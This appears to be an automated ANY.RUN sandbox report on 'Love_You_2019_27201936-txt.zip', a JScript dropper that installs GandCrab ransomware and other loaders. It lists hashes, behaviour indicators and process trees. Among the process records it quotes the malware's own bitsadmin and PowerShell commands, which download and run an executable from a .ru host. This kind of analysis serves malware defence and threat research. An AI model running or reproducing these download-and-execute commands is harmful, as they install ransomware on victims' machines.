General Info Watch the FULL Interactive Analysis at ANY.RUN!

File name

Love_You_2019_27201936-txt.zip

Verdict
Malicious activity
Analysis date
1/10/2019, 23:20:55
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
ransomware
gandcrab
Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v1.0 to extract
MD5

6dde1ca167ed67944fa5d13b86c6a343

SHA1

764e8aa30d7c4cf0219fef69ae4b8a7b32c769d5

SHA256

6e42ad9c545974ca943db43b964f4f0d8a36a028994dfa606118e2f14fc63532

SSDEEP

24:BkDkheN8YR9M4VDTX6FHoH+4D1mz0EtofWVWnqGbMImwjj+0e4hvTMDyJ:BkDkhi8Y9M4VDOK1mIEtOVbMbwjj+v4x

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • 2495831141.exe (PID: 2188)
  • 4177133078.exe (PID: 2580)
  • 1469420263.exe (PID: 3116)
  • 2184730977.exe (PID: 3076)
  • wincfg32svc.exe (PID: 2496)
  • 3478239163.exe (PID: 2452)
  • 3580527067.exe (PID: 3636)
  • 3327529366.exe (PID: 4092)
  • winsvcs.exe (PID: 2992)
  • winsvcs.exe (PID: 2868)
  • 495958594939.exe (PID: 4024)
  • 979574639568794.exe (PID: 3576)
Connects to CnC server
  • 3478239163.exe (PID: 2452)
Renames files like Ransomware
  • 3478239163.exe (PID: 2452)
Deletes shadow copies
  • 3478239163.exe (PID: 2452)
Changes settings of System certificates
  • 3478239163.exe (PID: 2452)
Dropped file may contain instructions of ransomware
  • 3478239163.exe (PID: 2452)
Writes file to Word startup folder
  • 3478239163.exe (PID: 2452)
Changes Security Center notification settings
  • winsvcs.exe (PID: 2992)
GandCrab keys found
  • 3478239163.exe (PID: 2452)
Downloads executable files from the Internet
  • winsvcs.exe (PID: 2868)
  • powershell.exe (PID: 3452)
Downloads executable files from IP
  • winsvcs.exe (PID: 2868)
Disables Windows Defender Real-time monitoring
  • winsvcs.exe (PID: 2992)
Actions looks like stealing of personal data
  • 3478239163.exe (PID: 2452)
Disables Windows System Restore
  • winsvcs.exe (PID: 2992)
Changes the autorun value in the registry
  • 3580527067.exe (PID: 3636)
  • 979574639568794.exe (PID: 3576)
  • 3327529366.exe (PID: 4092)
Executes PowerShell scripts
  • cmd.exe (PID: 2384)
Uses BITADMIN.EXE for downloading application
  • cmd.exe (PID: 2228)
Starts itself from another location
  • winsvcs.exe (PID: 2992)
  • 3327529366.exe (PID: 4092)
  • 3580527067.exe (PID: 3636)
  • 979574639568794.exe (PID: 3576)
Executable content was dropped or overwritten
  • winsvcs.exe (PID: 2992)
  • winsvcs.exe (PID: 2868)
  • 3580527067.exe (PID: 3636)
  • 3327529366.exe (PID: 4092)
  • 979574639568794.exe (PID: 3576)
  • powershell.exe (PID: 3452)
Adds / modifies Windows certificates
  • 3478239163.exe (PID: 2452)
Connects to SMTP port
  • wincfg32svc.exe (PID: 2496)
Creates files like Ransomware instruction
  • 3478239163.exe (PID: 2452)
Creates files in the program directory
  • 3478239163.exe (PID: 2452)
Reads the cookies of Mozilla Firefox
  • 3478239163.exe (PID: 2452)
Creates files in the user directory
  • winsvcs.exe (PID: 2868)
  • powershell.exe (PID: 3452)
  • 3478239163.exe (PID: 2452)
Executes scripts
  • WinRAR.exe (PID: 2984)
Starts CMD.EXE for commands execution
  • WScript.exe (PID: 3128)
Dropped object may contain TOR URL's
  • 3478239163.exe (PID: 2452)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
10
ZipBitFlag:
null
ZipCompression:
None
ZipModifyDate:
2004:01:10 19:08:07
ZipCRC:
0xa9cadeca
ZipCompressedSize:
1122
ZipUncompressedSize:
1122
ZipFileName:
Love_You_2019_27201936-txt.js

Screenshots

Processes

Total processes
53
Monitored processes
19
Malicious processes
11
Suspicious processes
1

Behavior graph

+
start download and start drop and start download and start download and start download and start download and start download and start drop and start drop and start drop and start drop and start winrar.exe no specs wscript.exe no specs cmd.exe no specs cmd.exe no specs bitsadmin.exe no specs powershell.exe 979574639568794.exe winsvcs.exe 495958594939.exe no specs 3580527067.exe 3327529366.exe winsvcs.exe wincfg32svc.exe #GANDCRAB 3478239163.exe 2495831141.exe no specs wmic.exe no specs 4177133078.exe no specs 1469420263.exe no specs 2184730977.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
2984
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Love_You_2019_27201936-txt.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wshext.dll
c:\windows\system32\wscript.exe
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll

PID
3128
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa2984.38950\Love_You_2019_27201936-txt.js"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll

PID
2228
CMD
"C:\Windows\System32\cmd.exe" /c bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe&start C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bitsadmin.exe
c:\users\admin\appdata\local\temp\495958594939.exe

PID
2384
CMD
"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3312
CMD
bitsadmin.exe /transfer getitman /download /priority high http://slpsrgpsrhojifdij.ru/krablin.exe C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Windows\system32\bitsadmin.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
BITS administration utility
Version
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qmgrprxy.dll

PID
3452
CMD
PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://slpsrgpsrhojifdij.ru/krablin.exe','C:\Users\admin\AppData\Local\Temp\979574639568794.exe');Start-Process 'C:\Users\admin\AppData\Local\Temp\979574639568794.exe'
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\979574639568794.exe
c:\windows\system32\netutils.dll

PID
3576
CMD
"C:\Users\admin\AppData\Local\Temp\979574639568794.exe"
Path
C:\Users\admin\AppData\Local\Temp\979574639568794.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\979574639568794.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\apphelp.dll
c:\users\admin\495030305060\winsvcs.exe

PID
2868
CMD
C:\Users\admin\495030305060\winsvcs.exe
Path
C:\Users\admin\495030305060\winsvcs.exe
Indicators
Parent process
979574639568794.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\495030305060\winsvcs.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\version.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\temp\3580527067.exe
c:\users\admin\appdata\local\temp\3327529366.exe
c:\users\admin\appdata\local\temp\3478239163.exe
c:\users\admin\appdata\local\temp\1469420263.exe
c:\users\admin\appdata\local\temp\2184730977.exe

PID
4024
CMD
C:\Users\admin\AppData\Local\Temp\495958594939.exe
Path
C:\Users\admin\AppData\Local\Temp\495958594939.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\495958594939.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\shell32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\sspicli.dll

PID
3636
CMD
C:\Users\admin\AppData\Local\Temp\3580527067.exe
Path
C:\Users\admin\AppData\Local\Temp\3580527067.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3580527067.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msvcr100.dll
c:\windows\system32\apphelp.dll
c:\users\admin\657607470096780\winsvcs.exe

PID
4092
CMD
C:\Users\admin\AppData\Local\Temp\3327529366.exe
Path
C:\Users\admin\AppData\Local\Temp\3327529366.exe
Indicators
Parent process
winsvcs.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\3327529366.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
